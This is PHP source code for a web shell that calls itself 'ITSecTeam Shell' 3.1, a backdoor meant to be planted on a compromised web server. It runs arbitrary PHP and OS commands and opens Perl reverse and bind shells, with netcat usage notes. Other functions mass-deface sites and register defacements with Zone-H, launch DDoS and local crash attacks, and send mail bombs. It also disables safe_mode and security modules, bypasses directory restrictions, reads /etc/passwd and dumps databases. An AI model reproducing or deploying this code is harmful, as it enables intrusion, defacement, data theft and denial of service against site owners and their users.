$getrow=$_GET[drop_row]; $getclm=$_GET[clm]; $query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'"; $tbl=$_SESSION[tbl]; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`"); } else $res=querY($type,$server,$user,$pass,$db,$query); if($res){ $res=htmlspecialchars($res); $row=array (); $title=explode('[+][+][+]',$res); $trow=explode('[-][-][-]',$title[1]); $row=explode('|+|+|+|+|+|',$title[0]); $data=array(); $field=$trow[count($trow)-2]; if (strstr($trow[0],'Database')!='') $obj='db'; elseif (substr($trow[0],0,6)=='Tables') $obj='tbl'; else $obj='row'; $i=0; foreach ($row as $a){ if($a!='') $data[$i++]=explode('|-|-|-|-|-|',$a); } echo ""; foreach ($trow as $ti) echo ""; echo ""; $j=0; while ($data[$j]){ echo ""; foreach ($data[$j++] as $dr){ echo ""; } echo ""; } echo "

$ti
"; if($obj!='row') echo ""; echo $dr; if($obj!='row') echo ""; echo "	Drop

"; } if(empty($_REQUEST['typE']))$_REQUEST['typE']=''; echo "$et"; } function querY($type,$host,$user,$pass,$db='',$query){ //Execute Query $res=''; switch($type){ case 'MySQL': if(!function_exists('mysql_connect'))return 0; $link=mysql_connect($host,$user,$pass); if($link){ if(!empty($db))mysql_select_db($db,$link); $result=mysql_query($query,$link); if ($result!=1){ while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|'; $res.='[+][+][+]'; for($i=0;$ialert('".$text."')"; } function check_error($res,$msg){ //Check Return Function For Error if ($res==null){ alert('Permission Denied !'); }else{ alert("$msg Successful !"); } } function Get_Checkbox($postList){ //Return All CheckBox Checked Data From Post $returnArray=array(); foreach ($postList['checked'] as $postTmp){ array_push($returnArray,$postTmp); } return $returnArray; } function dirCounter($address){ //Return Dir Count For Fix Problem Odd Or Even File List $baseHandle=opendir($address); while (false !== ($fileee = readdir($baseHandle))) { if ($fileee != "." && $fileee != "..") { if (filetype($fileee)=="dir"){ $counter++; } } } return $counter; } function Zone_H($url,$name){ //Register A Domain In zone_h.org if(check_function(curl_init)){ $ch = curl_init("http://zone-h.org/notify/single"); curl_setopt($ch, CURLOPT_POST ,1); curl_setopt($ch, CURLOPT_POSTFIELDS ,"defacer=$name&domain1=$url&hackmode=1&reason=3"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION ,1); curl_setopt($ch, CURLOPT_HEADER ,0); curl_setopt($ch, CURLOPT_RETURNTRANSFER ,1); $Rec_Data = curl_exec($ch); if (strpos($Rec_Data,"OK")>=1){ alert("Deface Registerd!"); } } sleep(1); } function PortScanner($portNum1,$postNum2,$ipAddress){ //Port Scanner $arrayPorts=array(); for($portCounter=intval($portNum1);$portCounter<=intval($postNum2);$portCounter++){ $sockPort = @fsockopen($ipAddress, $portCounter, $errno, $errstr, 1); if($sockPort){ array_push($arrayPorts,"Port $portCounter is open"); } } return $arrayPorts; } //-------------------- Function List --------------------- switch($_REQUEST['do']){ case 'image': //Show Image From Base64 if(!empty($_GET['img'])){ drawImage($_GET['img']); } break; case 'remove': //Remove MySelf $FILEMANAGER->remove_file(getcwd().$slash.$_SERVER["SCRIPT_NAME"]); break; case 'eval': //Execute Php Source Code if (!empty($_POST['evalsource'])){ eval($_POST['evalsource']); } echo $THEME->Main(input_hidden("do","eval").'<<<< Execute Php Code >>>>

',"post");exit; break; case 'about': //About Me echo $THEME->Main("

ITSecTeam, IT Security Research & Penetration Testing Team
Version 3.1
Last Update : 2010/10/10
Coded By : Amin Shokohi(Pejvak)
Special Thanks(M3hr@n.S , Am!rkh@n)
Home Page : http://www.itsecteam.com
Update Notice: ITSecTeam Shell
Forum : http://www.forum.itsecteam.com
".$itsec,"");exit; break; case 'rename': //Rename File if (!empty($_POST['oldfilename']) && !empty($_POST['newfilename'])){ check_error($FILEMANAGER->Rename($_POST['oldfilename'],$_POST['newfilename']),"Rename"); break; } echo $THEME->Main(input_hidden("do","rename").'<<<< Rename File >>>>

',"post");exit; break; case 'server': //Bypass Server Config switch($_POST['byserver']){ case 'offmodes': Write_File(getcwd().$slash.".htaccess",' Sec------Engine Off Sec------ScanPOST Off '); break; case 'bysymlink': Write_File(getcwd().$slash.".htaccess",'Options +FollowSymLinks DirectoryIndex Persian-Gulf-For-Ever.html'); break; case 'bysafeandfunc': Write_File(getcwd().$slash."php.ini",'safe_mode=OFF disable_functions=NONE'); break; } echo $THEME->Main(input_hidden("do","server").'<<<< Server Bypass >>>>

',"post");exit; break; case 'dd0s': //DD0s if ($_POST['ipaddress']){ $DD0S=new DD0S(); $DD0S->D0s_Remote($_POST['ipaddress'],$_POST['time']); } echo $THEME->Main(input_hidden("do","dd0s").'<<<< DD0S Remote Server >>>>

Address : Time :
','post');exit; break; case 'dlfile': //Download File if ($_POST['dladdress']){ $FILEMANAGER->Download_Remote($_POST['dladdress'],$_POST['saveaddress']); } echo $THEME->Main(input_hidden("do","dlfile").'<<<< Download Remote File >>>>

Address :
Save To :
','post');exit; break; case 'perm': //Find All Writeable Dir if ($_GET['diraddress']){ $arrfilelist=$FILEMANAGER->FindPermDir($_GET['diraddress']); if ($arrfilelist=='notfound'){ alert("Not Found !"); }elseif($arrfilelist=='notperm'){ alert("Permission Denied !"); }else{ foreach ($arrfilelist as $tmpdir){ if ($coi %2){ $color='"#e7e3de"'; }else{ $color='"#e4e1de"'; } $coi++; $permdir.=$THEME->Dir($tmpdir['diraddress'],$tmpdir['dirname'],$color); } } echo $THEME->Main($permdir,"");exit; } echo $THEME->Main(input_hidden("do","perm").'<<<< Find All Writeable Dir >>>>

','get');exit; break; case 'mass': //MassDef4ce if ($_POST['massaddress'] && $_POST['pagename'] && $_POST['pagesource']){ check_error($FILEMANAGER->MassDef($_POST['massaddress'],$_POST['pagename'],$_POST['pagesource']),"Mass Deface"); } echo $THEME->Main(input_hidden("do","mass").'<<<< Mass Deface >>>>

Source
Download_File($_GET['address'],$_GET['filename']);} elseif($_GET['type']=='dir'){ $addressDir=$_GET['address'].$slash.$_GET['dirname'].$slash; $zipfile = new zipfile(); $dlTime=date("y-m-d"); get_files_from_folder($addressDir,''); header("Content-Disposition: attachment; filename=" . $_GET['dirname']."-".$dlTime.".zip"); header("Content-Type: application/download"); header("Content-Length: " . strlen($zipfile -> file())); flush(); echo $zipfile -> file(); $filename = $_GET['dirname2'].$_GET['dirname']."-".$dlTime.".zip"; $fd = fopen ($filename, "wb"); fwrite ($fd, $zipfile -> file()); fclose ($fd); } break; case 'delete': //Delete Fild And Dir if ($_GET['type']=="dir"){ $addressDir=$_GET['address'].$_GET['dirname']; check_error($FILEMANAGER->Delete_Dir($addressDir),"Directory Deleted"); }elseif($_GET['type']=="file"){ $addressFile=$_GET['address'].$_GET['filename']; check_error($FILEMANAGER->Remove_File($addressFile),"File Deleted"); } break; case 'info': //Server Information if(ini_get('register_globals')){ $registerGlobalStatus="Enable"; }else{ $registerGlobalStatus="disable"; } if(extension_loaded('curl')){ $curlStatus="Enable"; }else{ $curlStatus="disable"; } if(@function_exists('mysql_connect')){ $dbStatus=$dbStatus."Mysql "; }; if(@function_exists('mssql_connect')){ $dbStatus=$dbStatus."Mssql "; }; if(@function_exists('pg_connect')){ $dbStatus=$dbStatus."PostgreSQL "; }; if(@function_exists('ocilogon')){ $dbStatus=$dbStatus."Oracle "; }; echo $THEME->Main("<<<< Server Information >>>>

Server : ".getenv("SERVER_SOFTWARE")."

Operating System : ".php_uname()."

Server Name : ".$_SERVER['HTTP_HOST']."

Disable_Functions : ".$disableFunctionList."

Safe_Mode : ".$safe_mode."

Openbase_dir : ".ini_get('openbase_dir')."

Username : ".get_current_user()."

Php Version : ".phpversion()."

Free Space : ".calc_size(disk_free_space("/"))."

Total Space : ".calc_size(disk_total_space("/"))."

Register_Globals : ".$registerGlobalStatus."

Maximum Upload Size : ".ini_get('upload_max_filesize')."

Maximum Execute Time : ".get_cfg_var('max_execution_time')." Second

Curl : ".$curlStatus."

Database Enable : ".$dbStatus."

Server Name : ".$_SERVER['HTTP_HOST']."

Admin Server : ".$_SERVER['SERVER_ADMIN'].'

',"");exit; break; case 'symlink': //Symlink switch($_POST['method']){ case 'php': if (@function_exists('symlink')){ symlink($_POST['fileaddress'],$_POST['filedes']); alert("Symlink Worked !"); }else{ alert("Symlink Not Worked !"); } break; case 'os': if (system('ls -s '.$_POST['fileaddress']." ".$_POST['filedes'])){ alert("Symlink Worked !"); }else{ alert("Symlink Not Worked !"); } break; } echo $THEME->Main(input_hidden("do","symlink").'<<<< Symlink >>>>

TO Use
','post');exit; break; case 'cmd': //Command Execute if($_POST['method']){ switch ($_POST['method']){ case 'system': $res=$CMD->System($_POST['command']); break; case 'exec': $res=$CMD->Exec($_POST['command']); break; case 'passthru': $res=$CMD->passthru($_POST['command']); break; case 'shell': $res=$CMD->Shell_Exec($_POST['command']); break; case 'proc': $res=$CMD->Proc_Open($_POST['command']); break; case 'popen': $res=$CMD->Popen($_POST['command']); break; case 'all': $res=$CMD->Check_All($_POST['command']); break; } } echo $THEME->Main('

<<<< Command Execute >>>>

'.$res.'

',"post");exit; break; case 'd0slocal': //D0s Local Server if ($_GET['method']){ $DD0S=new DD0S(); switch($_GET['method']){ case '1': $DD0S->D0s5_3_Local(); break; case '2': $DD0S->D0s4_Local(); break; } } echo $THEME->Main('<<<< D0S Local Server >>>>

If You Click This Link This Server Crashed.
This Worked In Php 5.3.x : Dos This Server I Am Sure
This Worked In Php 4.x.x And 5.2.9 : Dos This Server I Am Sure ',"");exit; break; case 'convert': //Convert String if ($_POST['text'] && $_POST['type']){ $BASE64=new Base64(); $HASH=new Hash(); switch($_POST['type']){ case 'b64e': $encodeString=$BASE64->Encode($_POST['text']); break; case 'b64d': $encodeString=$BASE64->Decode($_POST['text']); break; case 'md5'; $encodeString=$HASH->Md5($_POST['text']); break; case 'sha1': $encodeString=$HASH->Sha1($_POST['text']); break; case 'crc32': $encodeString=$HASH->Crc32($_POST['text']); break; } } echo $THEME->Main(input_hidden("do","convert").'<<<< Convert String >>>>

'.$encodeString.'
',"post");exit; break; case 'bypasscmd': //Bypass Command Execute if($_POST['type']=='wsh'){ $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll'); $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command'].""); $stdout = $exec->StdOut(); $res = $stdout->ReadAll(); }elseif($_POST['type']=='slash'){ $res=passthru('\\'.$_POST['command']); } echo $THEME->Main(input_hidden("do","bypasscmd").'<<<< Bypass Windows Command Execute >>>>

'.$res.'

','post');exit; break; case 'dump': //Dump DataBase if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){ $date = date("Y-m-d"); $dbserver = $_POST['server']; $dbuser = $_POST['username']; $dbpass = $_POST['password']; $dbname = $_POST['dbname']; $method = $_POST['method']; if ($method=='sql'){ $file="Dump-$dbname-$date.sql"; $fp=fopen($file,"w"); }else{ $file="Dump-$dbname-$date.sql.gz"; $fp = gzopen($file,"w"); } function write($data) { global $fp; if ($_POST['method']=='sql'){ fwrite($fp,$data); }else{ gzwrite($fp, $data); } } mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $tables = mysql_query ("SHOW TABLES"); while ($i = mysql_fetch_array($tables)) { $i = $i['Tables_in_'.$dbname]; $create = @mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); write($create['Create Table'].";\n\n"); $sql = mysql_query ("SELECT * FROM ".$i); if (@mysql_num_rows($sql)) { while ($row = mysql_fetch_row($sql)) { foreach ($row as $j => $k) { $row[$j] = "'".mysql_escape_string($k)."'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); } } } if ($method=='sql'){ fclose ($fp); }else{ gzclose($fp); } header("Content-Disposition: attachment; filename=" . $file); header("Content-Type: application/download"); header("Content-Length: " . filesize($file)); flush(); $fp = fopen($file, "r"); while (!feof($fp)){ echo fread($fp, 65536); flush(); } fclose($fp); } echo $THEME->Main(input_hidden("do","dump").'<<<< Dump Database >>>>

Backup Database
DB Type:
Server:
Username:
Password:
Data Base Name:

',"post");exit; break; case 'mail': //Email Boomber if ($_POST['email'] && $_POST['subject'] ){ for($i=0;$iMain(input_hidden("do","mail").'<<<< Mail Bomber >>>>

Email :

Title :

Text

Number For Send : ','post');exit; break; case 'db': //Data Base echo $head;sqlclienT();echo $end;exit; break; case 'bc': //Back Connect if ($_POST['port'] && $_POST['type']){ $BACKCONNECT=new BackConnect(); switch($_POST['type']){ case 'bconnect': $BACKCONNECT->Back_Connect_Perl($_POST['ipaddress'],$_POST['port']); break; case 'bind_1': $BACKCONNECT->Bind_Port_Perl($_POST['port']); break; case 'bind_2': $BACKCONNECT->Bind_Port_Perl2($_POST['port']); break; } } echo $THEME->Main("

<<<< Bypass Windows Command Execute >>>>

".$formPost.input_hidden("type","bconnect").input_hidden("do","bc")."

Ip Address : Port :
".$formPost.input_hidden("type","bind_1").input_hidden("do","bc")."

Usage : Run Netcat In Your Machin And Execute This Command( nc -l -n -v -p 5555 )

<<<<<< Windows Bind Port >>>>>>
Port :
".$formPost.input_hidden("type","bind_2").input_hidden("do","bc")."

Usage : Run Netcat In Your Machin And Execute This Command( nc -l -p 5555 )

<<<<<< Linux Bind Port >>>>>>
Port :
","");exit; break; case 'bypassdir': $BYPASS=new Byp4ss(); //Bypass if($_POST['fileaddress'] && $_POST['method']){ switch($_POST['method']){ case 'curl5': $res=$BYPASS->Curl5($_POST['fileaddress']); break; case 'curl4': $res=$BYPASS->Curl4($_POST['fileaddress']); break; case 'zlib': $res=$BYPASS->Zlib($_POST['fileaddress']); break; case 'symlink': $res=$BYPASS->Symlink($_POST['fileaddress']); break; case 'ini': $res=$BYPASS->Ini($_POST['fileaddress']); break; } }elseif($_POST['diraddress'] && $_POST['method']){ $res=$BYPASS->Glob($_POST['diraddress']); } echo $THEME->Main(input_hidden("do","bypassdir").'<<<< Bypass >>>>

'.$nowAddress.'Read File : '.$formPost.input_hidden("do","bypassdir").'

Show Dir : '.$nowAddress.'

'.htmlentities($res).'',"post");exit; case 'edit': //Edit File if($_POST['text'] && $_POST['filename']){ check_error(Write_File($_POST['address'].$slash.$_POST['filename'],html_entity_decode($_POST['text'])),"File Saved"); break; } if($_GET['filename'] || $_GET['fulladdress']){ if($_GET['fulladdress']){ $address=$_GET['fulladdress']; $fileName=basename($_GET['fulladdress']); }else{ $address=$_GET['address'].$_GET['filename']; $fileName=$_GET['filename']; } if(is_readable($address)){ $opedit=fopen($address,"r"); while(!feof($opedit)) $data.=fread($opedit,9999); fclose($opedit); echo $THEME->Main(input_hidden("do","edit").'<<<< Edit File >>>>

File Name : '.$address.'
'.htmlentities("$data").'

',"post");exit; }else{ alert("Permission Denied !");} } break; case 'newfile': //Create New File if($_POST['text'] && $_POST['filename']){ check_error(Write_File($_POST['filename'],$_POST['text']),"File Saved"); break; } echo $THEME->Main(input_hidden("do","newfile").input_hidden("address",getcwd()).'<<<< Create File >>>>

',"post");exit; break; case 'newdir': //Create New Dir if($_POST['dirname']){ check_error(@mkdir($_POST['dirname'],"0777"),"Directory Created"); } break; case 'upload': //Upload File if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]){ if(move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"])){ alert("File Upload Successful"); }else{ alert("Permission Denied !"); } } break; case 'chmod': //Change Permission if ($_POST['name'] && $_POST['chmod']){ check_error(@chmod($_POST['name'],"0".$_POST['chmod']),"Chmoded"); break; } echo $THEME->Main(input_hidden("do","chmod").input_hidden("name",$_GET['filename']).'<<<< Chmod >>>>

Set Premession : ',"post");exit; break; case 'password': //Password if($_SESSION['Login']=="ok"){ //Change Password if ($_POST['oldPassword'] && $_POST['newPassword']){ $source=Read_File($baseAddress.$_SERVER['PHP_SELF']); $source=str_replace(md5($_POST['oldPassword']),md5($_POST['newPassword']),$source); check_error(Write_File($baseAddress.$_SERVER['PHP_SELF'],$source),'Password Changed'); break; } echo $THEME->Main(input_hidden("do","password").'<<<< Change Password >>>>

Old Password : New Password : ','post');exit; } if(empty($loginPassword)){ //Set A Password if($_POST['newPassword']){ $passSource='Main(input_hidden("do","password").'<<<< Edit >>>>

Password : ','post');exit; } case 'phpinf0': //Show PhpInfo echo "Back
"; echo phpinfo(); exit; break; case 'checkbox': //Do Form CheckBox $fileCounterC=0; switch ($_POST['command']){ case 'del': //Del All Checked In CheckBox foreach(Get_Checkbox($_POST) as $fileName){ $fileCounterC++; if(is_dir($fileName)){ $FILEMANAGER->Delete_Dir($fileName); }elseif(is_file($fileName)){ $FILEMANAGER->Remove_File($fileName); } } check_error($fileCounterC,"$fileCounterC Deleted"); break; case 'copy': //Copy All Checked In CheckBox if($_POST['list'] && $_POST['destfile']){ $arrayFiles=explode(",_,",$_POST['list']); foreach($arrayFiles as $fileName){ $fileCounterC++; if(is_dir($fileName)){ $FILEMANAGER->Copy_Dir($fileName,$_POST['destfile']); }elseif(is_file($fileName)){ $FILEMANAGER->Copy_File($fileName,$_POST['destfile'],""); } } check_error($fileCounterC,"$fileCounterC Copyed"); break; } foreach(Get_Checkbox($_POST) as $tmpFile){ $fileList.=$tmpFile."
"; } echo $THEME->Main(input_hidden("do","checkbox").input_hidden("command","copy").input_hidden("list",implode(",_,",Get_Checkbox($_POST))).'<<<< Copy Files >>>>

'.$fileList.'To
','post');exit; break; case 'move': //Copy All Checked In CheckBox if($_POST['list'] && $_POST['destfile']){ $arrayFiles=explode(",_,",$_POST['list']); foreach($arrayFiles as $fileName){ $fileCounterC++; if(is_dir($fileName)){ $FILEMANAGER->Move_Dir($fileName,$_POST['destfile']); }elseif(is_file($fileName)){ $FILEMANAGER->Move_File($fileName,$_POST['destfile']); } } check_error($fileCounterC,"$fileCounterC Moved"); break; } foreach(Get_Checkbox($_POST) as $tmpFile){ $fileList.=$tmpFile."
"; } echo $THEME->Main(input_hidden("do","checkbox").input_hidden("command","move").input_hidden("list",implode(",_,",Get_Checkbox($_POST))).'<<<< Copy Files >>>>

'.$fileList.'To
','post');exit; break; case 'chmod': //Change Permission All Checked In CheckBox if($_POST['list'] && $_POST['perm']){ $arrayFiles=explode(",_,",$_POST['list']); foreach($arrayFiles as $fileName){ $fileCounterC++; chmod($fileName,'0'.$_POST['perm']); } check_error($fileCounterC,"$fileCounterC Chmoded"); break; } foreach(Get_Checkbox($_POST) as $tmpFile){ $fileList.=$tmpFile."
"; } echo $THEME->Main(input_hidden("do","checkbox").input_hidden("command","chmod").input_hidden("list",implode(",_,",Get_Checkbox($_POST))).'<<<< Chmod Files >>>>

'.$fileList.'To
','post');exit; break; } break; case 'multiupload': //Upload Multipe File if($_POST['multiupload']){ foreach ($_FILES["files"]["error"] as $key => $error) { if ($error == UPLOAD_ERR_OK) { echo"$error_codes[$error]"; @move_uploaded_file($_FILES["files"]["tmp_name"][$key],$_FILES["files"]["name"][$key]); $uploadCounter++; } } if ($uploadCounter>=1){ alert($uploadCounter." Files Uploaded Successful!"); }else{ alert('Permission Denied !'); } break; } echo $THEME->Main('<<<< Upload Multipe File >>>>

',"");exit; break; case 'port': //Port Scanner if($_POST['portnum1'] && $_POST['portnum2'] && $_POST['ipaddress']){ $arrayOpenPort=PortScanner($_POST['portnum1'],$_POST['portnum2'],$_POST['ipaddress']); foreach($arrayOpenPort as $tmpPort){ echo $THEME->Main($tmpPort.'
','');exit; } break; } echo $THEME->Main(input_hidden("do","port").'<<<< Port Scanner >>>>

ip : Port : To ','post');exit; break; case 'cookie': //Set Cookie Or Session if($_POST['sessionname'] && $_POST['sessionvalue']){ $_SESSION[$_POST['sessionname']]=$_POST['sessionvalue']; alert("Session Set"); break; }elseif($_POST['cookiename'] && $_POST['cookievalue']){ check_error(@setcookie($_POST['cookiename'], $_POST['cookievalue']),"Cookie Set"); break; } echo $THEME->Main(input_hidden("do","cookie").'<<<< Set Cookie >>>>

Name :
Value :

'.$formPost.'

'.input_hidden("do","cookie").$nowAddress.'<<<< Set Session >>>>

Name :
Value :
','post');exit; break; case 'processes': //Show Processes List echo $THEME->Main("<<<< Processes List >>>>

".GetProcesses()."","");exit; break; case 'move': //Move File if($_POST['sourcefile'] && $_POST['destfile']){ check_error($FILEMANAGER->Move_File($_POST['sourcefile'],$_POST['destfile']),"File Moved"); }elseif($_GET['sourcefile']){ $arrayDirList=ListDir(getcwd(),"dir","move"); echo $THEME->Main('

Now Directory : '.getcwd()."
".printdrive().'
Back
'.$arrayDirList['dir'].input_hidden("do",'move').input_hidden("sourcefile",$_GET['sourcefile']).input_hidden("destfile",$_REQUEST['address']).'

','post');exit; } break; case 'copy': //Copy File if ($_POST['sourcefile'] && $_POST['destfile']){ check_error($FILEMANAGER->Copy_File($_POST['address'].$slash.$_POST['sourcefile'],$_POST['destfile'],""),"Copy File"); }elseif($_GET['sourcefile']){ $arrayDirList=ListDir(getcwd(),"dir","copy"); echo $THEME->Main('

Now Directory : '.getcwd()."
".printdrive().'
Back
'.$arrayDirList['dir'].input_hidden("do",'copy').input_hidden("sourcefile",$_GET['sourcefile']).input_hidden("destfile",$_REQUEST['address']).'

','post');exit; } break; case 'copydir': //Copy Dir if($_POST['sourcedir'] && $_POST['destdir']){ check_error($FILEMANAGER->Copy_Dir($_POST['sourcedir'],$_POST['destdir']),"Dir Copy"); }elseif($_GET['sourcedir']){ $arrayDirList=ListDir(getcwd(),"dir","copydir"); echo $THEME->Main('

Now Directory : '.getcwd()."
".printdrive().'
Back
'.$arrayDirList['dir'].input_hidden("do",'copydir').input_hidden("sourcedir",$_GET['sourcedir']).input_hidden("destdir",$_REQUEST['address']).'

','post');exit; } break; case 'movedir': //Move Dir if($_POST['sourcedir'] && $_POST['destdir']){ check_error($FILEMANAGER->Move_Dir($_POST['sourcedir'],$_POST['destdir']),"Dir Copy"); }elseif($_GET['sourcedir']){ $arrayDirList=ListDir(getcwd(),"dir","movedir"); echo $THEME->Main('

Now Directory : '.getcwd()."
".printdrive().'
Back
'.$arrayDirList['dir'].input_hidden("do",'movedir').input_hidden("sourcedir",$_GET['sourcedir']).input_hidden("destdir",$_REQUEST['address']).'

','post');exit; } break; case 'zone': //Submit in Zone_h.org if($_POST['url'] && $_POST['name']){ foreach (explode(",",$_POST['url']) as $tmpUrl){ Zone_H($tmpUrl,$_POST['name']); } break; } echo $THEME->Main('<<<< Submit In Zone-H.org >>>>

'.input_hidden("do","zone").'Single

Url :
Name :

'.$formPost.'

Multi Submiter

Name :
Split With "," Example : www.yahoo.com,www.google.com,www.example.com,www.site.com
'.input_hidden("do","zone").'
','post');exit; break; case 'users': //Show Users List if(Is_Win){ $res=$CMD->Check_All("net user"); }else{ if(!$res=Read_File("/etc/passwd")){ for($bye=0;$bye<200;$bye++){ $res.= posix_getpwuid($bye); } if(!$res){ $res="Can Not Read etc/passwd"; } } } echo $THEME->Main('<<<< Users List >>>>

'.$res.'','');exit; break; } $arrayFiles=ListDir(getcwd(),"",""); $backLink=''; echo $head.'

Now Directory : '.Split_Address(getcwd())."
".printdrive().'
'.$backLink.'

'.$arrayFiles['dir'].$arrayFiles['file'].''.$nowAddress.'
Directory : '.$DirCount.' -- File : '.$FileCount.' '.input_hidden("do","checkbox").'
'.$end; ?>

'.$formPost.'Command Execute : '.$nowAddress.''.input_hidden("do","cmd").'

'.$formGet.'Change Dir :

'.$formGet.'Edit File : '.input_hidden("do","edit").''.$nowAddress.'

'.$formPost.'Create Dir : '.input_hidden("do","newdir").''.$nowAddress.'

'.$formGet.'Create File : '.input_hidden("do","newfile").' '.$nowAddress.'

Upload :
'.$nowAddress.' '.input_hidden("do","upload").' Maximum Size : '.ini_get('upload_max_filesize').'

Connect to Database
DB Type:
Server Address:
Username:
Password:
Submit a Query
DB Name:
Query:	"; if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES'; echo "
$hcwd

Backup Database
DB Type:
Server:
Username:
Password:
Data Base Name:

'.$formPost.'Command Execute :	'.$nowAddress.''.input_hidden("do","cmd").'
'.$formGet.'Change Dir :
'.$formGet.'Edit File :	'.input_hidden("do","edit").''.$nowAddress.'
'.$formPost.'Create Dir :	'.input_hidden("do","newdir").''.$nowAddress.'
'.$formGet.'Create File :	'.input_hidden("do","newfile").' '.$nowAddress.'
Upload :	'.$nowAddress.' '.input_hidden("do","upload").' Maximum Size : '.ini_get('upload_max_filesize').'